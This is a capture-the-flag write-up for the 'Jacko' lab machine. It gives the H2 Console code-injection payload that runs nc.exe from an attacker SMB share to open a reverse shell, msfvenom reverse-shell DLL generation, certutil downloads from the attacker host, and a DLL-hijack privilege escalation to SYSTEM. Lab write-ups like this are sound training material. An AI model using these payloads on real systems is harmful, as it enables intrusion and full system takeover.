| description |
|---|
PG Practice Jacko writeup |
sudo nmap 192.168.67.66 -p- -sS -sV
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
7680/tcp open pando-pub?
8082/tcp open http H2 database http console
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
On port 8082 we have a login page for H2 Console. Connecting with the default inputted values allows login to the console.
.png)
Once logged in we can see that we are running on H2 Console version 1.4.199. A search on exploit-db shows that version 1.4.199 is vulnerable to code injection using Java.
{% embed url="https://www.exploit-db.com/exploits/49384" %}
The following snippet is the vulnerable code we need to run on the H2 Console:
.png)
The section of the code that executed commands on the target machine has been shown below. To achieve code execution I set up a SMB Server on my attacking machine with Impacket's SMBserver.py script and ensured nc.exe was in the specified SMB share.
-- Evaluate script CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c //192.168.49.67/Share/nc.exe -e cmd.exe 192.168.49.67 8082").getInputStream()).useDelimiter("\Z").next()');
First set up a SMB server:
python2 smbserver.py -smb2support Share /home/kali/
.png)
Then paste the code from exploit-db into the SQL statement section of the website and ensure the --evaluate script section has the command for calling nc.exe on the attacking machines SMB server.
.png)
When ready run the SQL statement and we should see authentication on smbserver.py
.png)
And then shortly after catch a reverse shell on our netcat listener.
.png)
First we need to fix PATH on the target machine as shown below:
set PATH=%SystemRoot%\system32;%SystemRoot%;
.png)
Looking through Program files (x86) we can see a directory called PAPERSTREAM IP. Looking for exploits on exploit-db takes us to the following:
{% embed url="https://www.exploit-db.com/exploits/49382" %}
The description for this exploit is shown below:
A DLL hijack vulnerability exists in the FJTWSVIC service running as part of
the Fujitsu PaperStream IP (TWAIN) software package. This exploit searches
for a writable location, copies the specified DLL to that location and then
triggers the DLL load by sending a message to FJTWSVIC over the FjtwMkic_Fjicube_32
named pipe.
# Example payload generated as follows
# msfvenom -p windows/x64/shell_reverse_tcp -f dll -o shell.dll LHOST=eth0 LPORT=4444
$PayloadFile = "C:\Windows\Temp\UninOldIS.dll"
We need to change the DLL name generated by msfvenom and the payload location. When I attempted to download exploit to c:\windows\temp my file was deleted instantly. Possibly by AV?
First I generated a msfvenom shell to the name of the DLL required which is UninOldIS.dll. msfvenom -p windows/shell_reverse_tcp -f dll -o UninOldIS.dll LHOST=192.168.49.67 LPORT=8082
Then changed the payload file variable to the users Desktop.
%20(1).png)
At this point move into the users Desktop then use certutil to download the files as when copying by SMB I could get the payload to trigger without issues.
certutil -urlcache -split -f http://192.168.49.67/exploit.ps1 exploit.ps1
certutil -urlcache -split -f http://192.168.49.67/UninOldIS.dll UninOldIS.dll
Start a netcat listener on the attacking machine to listen in on port 8082. Then execute the Powershell exploit.ps1 on the target machine.
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\users\tony\Desktop\exploit.ps1
%20(1).png)
A short while later we should receive a shell as SYSTEM.
.png)